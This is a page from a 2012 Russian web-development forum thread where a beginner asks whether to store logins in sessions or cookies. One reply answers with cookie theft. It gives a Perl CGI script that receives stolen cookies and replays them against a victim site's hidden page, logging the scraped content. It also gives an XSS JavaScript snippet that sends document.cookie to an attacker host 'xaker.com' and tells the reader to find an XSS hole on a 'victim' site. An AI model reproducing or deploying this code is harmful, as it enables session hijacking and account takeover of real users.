PHP и мелкие вопросы

Активность

PHP и мелкие вопросы

29.04.2012 / 17:29	#160049 Скопировать ссылку Скопировать как BB-код Перейти к посту
TAPAHbl4 Пользователь Сейчас: Offline Имя: TAPAHbl4 Регистрация: 15.01.2012	зачем в сессию?!

29.04.2012 / 17:46	#160058 Скопировать ссылку Скопировать как BB-код Перейти к посту
Dinisimys1 Пользователь Сейчас: Offline Имя: Денис Регистрация: 23.01.2011	TAPAHbl4, я не знаю, может пригодится))) Я че не надо?

29.04.2012 / 17:48	#160059 Скопировать ссылку Скопировать как BB-код Перейти к посту
Dinisimys1 Пользователь Сейчас: Offline Имя: Денис Регистрация: 23.01.2011	Одни в сессию говорят, другие в куки. Кого слушать? Ну да ладно, а пароль и логин с бд проверять надо или нет?

29.04.2012 / 18:02	#160066 Скопировать ссылку Скопировать как BB-код Перейти к посту
Naik Пользователь Сейчас: Offline Имя: %name% Регистрация: 14.03.2010	Dinisimys1, Конечно, а как же ты без проверки идентифицируешь пользователя?

29.04.2012 / 18:02	#160067 Скопировать ссылку Скопировать как BB-код Перейти к посту
HoldFast Пользователь Сейчас: Offline Имя: Андрей Откуда: Великие Луки Регистрация: 18.04.2011	Dinisimys1, сессия это сессия. А куки это куки. Тут уж как тебе надо, так и делай __________________ Да, детка, я - Король Ящериц!!!

29.04.2012 / 18:25	#160076 Скопировать ссылку Скопировать как BB-код Перейти к посту
Dinisimys1 Пользователь Сейчас: Offline Имя: Денис Регистрация: 23.01.2011	Naik, куки ведь сохраняется.

30.04.2012 / 23:33

Николаевич

Пользователь

Сейчас: Offline

cookie сохраняются на стороне клиента и могут храниться там оч долго,а сессии хранятся на стороне сервера. Теперь про горечь в печенюшках.
Ищим xss на сайте жертвы и принимаем ети крюки. Дальше на лету:

[копировать] [скачать]
#!/usr/bin/perl
use CGI::Carp qw(fatalsToBrowser);
print "Content-type: text/html; charset=utf-8\n\n";
use LWP::UserAgent;
use LWP::ConnCache;
$ua = LWP::UserAgent->new;
$cache = $ua->conn_cache(LWP::ConnCache->new( ));
#В ГЕТ ПРИНИМАЕМ КУКИ И КОНЕКТИМСЯ
$cook=$ENV['QUERY_STRING'];
@ns_headers = ('Accept' => 'text/ xml,application/
xml,application/xhtml
+xml,text/
html;q=0.9,text/
plain;q=0.8,image/png,*/
*;q=0.5' ,'Accept- Language' => 'ru- ru,ru;q=0.8,en-
us;q=0.5,en;q=0.3' ,'Accept- Encoding' => 'gzip,deflate' ,'Accept- Charset' =>'windows-1251,utf-8;q=0.7,*;q=0.7' ,'Connection' =>'keep- alive' ,'Keep-Alive' => '300' ,'Cookie' =>$cook);
$resp = $ua->get( "http://сайт/скрытая страница",@ns_headers);
 
if ($resp->is_success) {
#разбираем страницу и пишим в лог
open(LOG,">>log.dat");
while ($page =~m/регекс/ig) {
print "$1\n";
   print(LOG "$1\n");
}
}
close(LOG);

эт набросок

30.04.2012 / 23:48

Николаевич

Пользователь

Сейчас: Offline

а если аякс заставить работать на сайте нуба то

[копировать] [скачать]
ajax=getAjax();
if (ajax != null) {
ajax.open("GET", "xaker.com/cgi-bin/test.cgi?cook=" + document.cookie, true);
ajax.send(null);
ajax.onreadystatechange = function(){
  if(ajax.readyState==4)  
document.getElementById('div').innerHTML=ajax.responseText;}
 
}
}

примерно так. Вот тебе и куки. Сессия надежней.в ajax.responseText можно привед передать. :-D

Изменено Николаевич (30.04 / 23:51) (всего 1 раз)

1.05.2012 / 00:54	#160429 Скопировать ссылку Скопировать как BB-код Перейти к посту
HoldFast Пользователь Сейчас: Offline Имя: Андрей Откуда: Великие Луки Регистрация: 18.04.2011	маразм какой-то __________________ Да, детка, я - Король Ящериц!!!

3.05.2012 / 14:16	#160945 Скопировать ссылку Скопировать как BB-код Перейти к посту
Dinisimys1 Пользователь Сейчас: Offline Имя: Денис Регистрация: 23.01.2011	Николаевич, спасибо боольшое. я ниче не понял.

<< 1 ... 211 212 213 214 215 ... 474 >>

Всего сообщений: 4740

Фильтровать сообщения

Поиск по теме

Файлы топика (129)